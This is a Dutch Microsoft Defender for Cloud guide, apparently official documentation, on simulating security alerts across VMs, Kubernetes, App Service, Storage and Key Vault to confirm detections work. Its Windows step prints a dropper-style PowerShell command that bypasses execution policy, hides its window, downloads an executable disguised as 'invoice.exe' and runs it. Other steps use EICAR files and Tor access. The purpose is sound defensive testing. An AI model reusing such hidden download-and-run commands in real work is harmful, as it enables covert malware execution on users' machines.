Validatie van waarschuwing in Microsoft Defender for Cloud

  • Artikel

In dit document leert u hoe u kunt controleren of uw systeem correct is geconfigureerd voor Microsoft Defender voor Cloud waarschuwingen.

Wat zijn beveiligingswaarschuwingen?

Waarschuwingen zijn de meldingen die Defender for Cloud genereert wanneer bedreigingen voor uw resources worden gedetecteerd. Het geeft prioriteit aan en vermeldt de waarschuwingen, samen met de informatie die nodig is om het probleem snel te onderzoeken. Defender voor Cloud biedt ook aanbevelingen voor hoe u een aanval kunt herstellen.

Zie Beveiligingswaarschuwingen in Defender voor Cloud en beveiligingswaarschuwingen beheren en erop reageren voor meer informatie.

Vereisten

Als u alle waarschuwingen wilt ontvangen, moeten uw computers en de verbonden Log Analytics-werkruimten zich in dezelfde tenant bevinden.

Voorbeeldwaarschuwingen voor beveiliging genereren

Als u de nieuwe preview-ervaring voor waarschuwingen gebruikt, zoals beschreven in Beheren en reageren op beveiligingswaarschuwingen in Microsoft Defender voor Cloud, kunt u voorbeeldwaarschuwingen maken op de pagina beveiligingswaarschuwingen in Azure Portal.

Voorbeeldwaarschuwingen gebruiken om:

  • evalueer de waarde en mogelijkheden van uw Microsoft Defender-abonnementen.
  • valideer alle configuraties die u hebt gemaakt voor uw beveiligingswaarschuwingen (zoals SIEM-integraties, werkstroomautomatisering en e-mailmeldingen).

Voorbeeldwaarschuwingen maken:

  1. Als gebruiker met de rol Inzender voor abonnementen selecteert u voorbeeldwaarschuwingen op de werkbalk op de pagina Beveiligingswaarschuwingen.

  2. Selecteer het abonnement.

  3. Selecteer het relevante Microsoft Defender-abonnement/s waarvoor u waarschuwingen wilt zien.

  4. Selecteer Voorbeeldwaarschuwingen maken.

    Schermopname van de stappen voor het maken van voorbeeldwaarschuwingen in Microsoft Defender voor Cloud.

    Er wordt een melding weergegeven die u laat weten dat de voorbeeldwaarschuwingen worden gemaakt:

    Schermopname van de melding dat de voorbeeldwaarschuwingen worden gegenereerd.

    Na een paar minuten worden de waarschuwingen weergegeven op de pagina beveiligingswaarschuwingen. Ze worden ook ergens anders weergegeven die u hebt geconfigureerd voor het ontvangen van uw Microsoft Defender voor Cloud beveiligingswaarschuwingen (verbonden SIEM's, e-mailmeldingen, enzovoort).

    Schermopname van voorbeeldwaarschuwingen in de lijst met beveiligingswaarschuwingen.

    Tip

    De waarschuwingen zijn voor gesimuleerde resources.

Waarschuwingen simuleren op uw Azure-VM's (Windows)

Nadat de Microsoft Defender voor Eindpunt-agent op uw computer is geïnstalleerd, voert u de volgende stappen uit vanaf de computer waarop u de aangevallen resource van de waarschuwing wilt zijn:

  1. Open een opdrachtregelprompt met verhoogde bevoegdheid op het apparaat en voer het script uit:

    1. Ga naar Start en typ cmd.

    2. Opdrachtprompt met de rechtermuisknop selecteren en Uitvoeren als administrator selecteren

    Schermopname die laat zien waar u Uitvoeren als Beheer istrator selecteert.

  2. Kopieer en voer de volgende opdracht uit bij de prompt: powershell.exe -NoExit -ExecutionPolicy Bypass -WindowStyle Hidden $ErrorActionPreference = 'silentlycontinue';(New-Object System.Net.WebClient).DownloadFile('http://127.0.0.1/1.exe', 'C:\\test-MDATP-test\\invoice.exe');Start-Process 'C:\\test-MDATP-test\\invoice.exe'

  3. Het opdrachtpromptvenster wordt automatisch gesloten. Als dit lukt, wordt er binnen 10 minuten een nieuwe waarschuwing weergegeven op Defender voor Cloud blade Waarschuwingen.

  4. De berichtregel in het PowerShell-vak moet er ongeveer als volgt uitzien:

    Schermopname van de PowerShell-berichtregel.

U kunt ook de EICAR-testreeks gebruiken om deze test uit te voeren: Maak een tekstbestand, plak de EICAR-regel en sla het bestand op als uitvoerbaar bestand op het lokale station van uw computer.

Notitie

Wanneer u testwaarschuwingen voor Windows bekijkt, moet u Ervoor zorgen dat Defender voor Eindpunt wordt uitgevoerd met realtime-beveiliging ingeschakeld. Meer informatie over het valideren van deze configuratie.

Waarschuwingen simuleren op uw Virtuele Azure-machines (Linux)

Nadat de Microsoft Defender voor Eindpunt-agent op uw computer is geïnstalleerd, voert u de volgende stappen uit vanaf de computer waarop u de aangevallen resource van de waarschuwing wilt zijn:

  1. Open een Terminal-venster, kopieer en voer de volgende opdracht uit: curl -O https://secure.eicar.org/eicar.com.txt

  2. Het opdrachtpromptvenster wordt automatisch gesloten. Als dit lukt, wordt er binnen 10 minuten een nieuwe waarschuwing weergegeven op Defender voor Cloud blade Waarschuwingen.

Notitie

Wanneer u testwaarschuwingen voor Linux bekijkt, moet u Ervoor zorgen dat Defender voor Eindpunt wordt uitgevoerd met realtime-beveiliging ingeschakeld. Meer informatie over het valideren van deze configuratie.

Waarschuwingen in Kubernetes simuleren

Defender for Containers biedt beveiligingswaarschuwingen voor zowel uw clusters als onderliggende clusterknooppunten. Defender for Containers doet dit door zowel het besturingsvlak (API-server) als de containerworkload te bewaken.

U kunt zien of uw waarschuwing is gerelateerd aan het beheerplan of de workload in een container op basis van het voorvoegsel. Beveiligingswaarschuwingen voor besturingsvlak hebben een voorvoegsel vanK8S_, terwijl beveiligingswaarschuwingen voor runtimeworkloads in de clusters een voorvoegsel hebben.K8S.NODE_

U kunt waarschuwingen voor zowel het besturingsvlak als workloadwaarschuwingen simuleren met de volgende stappen.

Waarschuwingen voor besturingsvlak simuleren (K8S_ voorvoegsel)

Vereisten

  • Zorg ervoor dat het Defender for Containers-abonnement is ingeschakeld.
  • Alleen arc: zorg ervoor dat de Defender-sensor is geïnstalleerd.
  • Alleen EKS of GKE : zorg ervoor dat de standaardopties voor het automatisch inrichten van auditlogboeken zijn ingeschakeld.

Een Beveiligingswaarschuwing voor een Kubernetes-besturingsvlak simuleren:

  1. Voer de volgende opdracht uit vanuit het cluster:

    kubectl get pods --namespace=asc-alerttest-662jfi039n

    U krijgt het volgende antwoord: No resource found.

  2. Wacht 30 minuten.

  3. Navigeer in Azure Portal naar de pagina met beveiligingswaarschuwingen van de Defender voor Cloud.

  4. Zoek in het relevante Kubernetes-cluster de volgende waarschuwing Microsoft Defender for Cloud test alert for K8S (not a threat)

Workloadwaarschuwingen simuleren (K8S. NODE_ voorvoegsel)

Vereisten

  • Zorg ervoor dat het Defender for Containers-abonnement is ingeschakeld.
  • Zorg ervoor dat de Defender-sensor is geïnstalleerd.

Een beveiligingswaarschuwing voor Kubernetes-werkbelasting simuleren:

  1. Maak een pod om een testopdracht uit te voeren. Deze pod kan een van de bestaande pods in het cluster of een nieuwe pod zijn. U kunt deze yaml-voorbeeldconfiguratie maken:

    apiVersion: v1
kind: Pod
metadata:
    name: mdc-test
spec:
    containers:
        - name: mdc-test
          image: ubuntu:18.04
          command: ["/bin/sh"]
          args: ["-c", "while true; do echo sleeping; sleep 3600;done"]

    Ga als volgende te werk om de poduitvoering te maken:

    kubectl apply -f <path_to_the_yaml_file>

  2. Voer de volgende opdracht uit vanuit het cluster:

    kubectl exec -it mdc-test -- bash

  3. Kopieer het uitvoerbare bestand naar een afzonderlijke locatie en wijzig de naam ervan ./asc_alerttest_662jfi039n in met de volgende opdracht cp /bin/echo ./asc_alerttest_662jfi039n.

  4. Voer het bestand ./asc_alerttest_662jfi039n testing eicar pipeuit.

  5. Wacht tien minuten.

  6. Navigeer in Azure Portal naar de pagina met beveiligingswaarschuwingen van de Defender voor Cloud.

  7. Zoek de volgende waarschuwing Microsoft Defender for Cloud test alert (not a threat)op het relevante AKS-cluster.

U kunt ook meer informatie krijgen over het verdedigen van uw Kubernetes-knooppunten en -clusters met Microsoft Defender for Containers.

Waarschuwingen simuleren voor App Service

U kunt waarschuwingen simuleren voor resources die worden uitgevoerd in App Service.

  1. Maak een nieuwe website en wacht 24 uur tot deze is geregistreerd bij Defender voor Cloud of gebruik een bestaande website.

  2. Zodra de website is gemaakt, opent u deze met behulp van de volgende URL:

    1. Open het resourcevenster van de App Service en kopieer het domein voor de URL uit het standaarddomeinveld.

      Schermopname die laat zien waar het standaarddomein moet worden gekopieerd.

    2. Kopieer de websitenaam naar de URL: https://<website name>.azurewebsites.net/This_Will_Generate_ASC_Alert.

  3. Er wordt binnen ongeveer 1-2 uur een waarschuwing gegenereerd.

Waarschuwingen simuleren voor Storage ATP (Advanced Threat Protection)

  1. Navigeer naar een opslagaccount waarvoor Azure Defender for Storage is ingeschakeld.

  2. Selecteer het tabblad Containers in de zijbalk.

    Schermopname die laat zien waar u naar een container kunt navigeren.

  3. Navigeer naar een bestaande container of maak een nieuwe container.

  4. Upload een bestand naar die container. Vermijd het uploaden van bestanden die gevoelige gegevens kunnen bevatten.

    Schermopname die laat zien waar een bestand naar de container moet worden geüpload.

  5. Selecteer met de rechtermuisknop het geüploade bestand en selecteer SAS genereren.

  6. Selecteer de knop SAS-token en URL genereren (u hoeft geen opties te wijzigen).

  7. Kopieer de gegenereerde SAS-URL.

  8. Open de Tor-browser, die u hier kunt downloaden.

  9. Navigeer in de Tor-browser naar de SAS-URL. U zou nu het bestand moeten zien en kunnen downloaden dat is geüpload.

AppServices-waarschuwingen testen

Een EICAR-waarschuwing voor app-services simuleren:

  1. Zoek het HTTP-eindpunt van de website door naar de azure-portalblade te gaan voor de App Services-website of door de aangepaste DNS-vermelding te gebruiken die aan deze website is gekoppeld. (Het standaard-URL-eindpunt voor Azure-app Services-website heeft het achtervoegselhttps://XXXXXXX.azurewebsites.net). De website moet een bestaande website zijn en niet een website die is gemaakt vóór de waarschuwingssimulatie.
  2. Blader naar de URL van de website en voeg het volgende vaste achtervoegsel toe: /This_Will_Generate_ASC_Alert. De URL moet er als volgt uitzien: https://XXXXXXX.azurewebsites.net/This_Will_Generate_ASC_Alert. Het kan enige tijd duren voordat de waarschuwing is gegenereerd (~1,5 uur).

Azure Key Vault-detectie van bedreigingen valideren

  1. Als u nog geen Key Vault hebt gemaakt, moet u er een maken.
  2. Nadat u de Sleutelkluis en het geheim hebt gemaakt, gaat u naar een virtuele machine met internettoegang en downloadt u de TOR-browser.
  3. Installeer de TOR-browser op uw VIRTUELE machine.
  4. Zodra u klaar bent met de installatie, opent u uw gewone browser, meldt u zich aan bij Azure Portal en opent u de Key Vault-pagina. Selecteer de gemarkeerde URL en kopieer het adres.
  5. Open TOR en plak deze URL (u moet zich opnieuw verifiëren voor toegang tot Azure Portal).
  6. Na het voltooien van de toegang kunt u ook de optie Geheimen selecteren in het linkerdeelvenster.
  7. Meld u in de TOR-browser af bij Azure Portal en sluit de browser.
  8. Na enige tijd activeert Defender voor Key Vault een waarschuwing met gedetailleerde informatie over deze verdachte activiteit.

Volgende stappen

In dit artikel hebben we aandacht besteed aan het valideren van waarschuwingen. Nu u bekend bent met deze validatie, bekijkt u de volgende artikelen: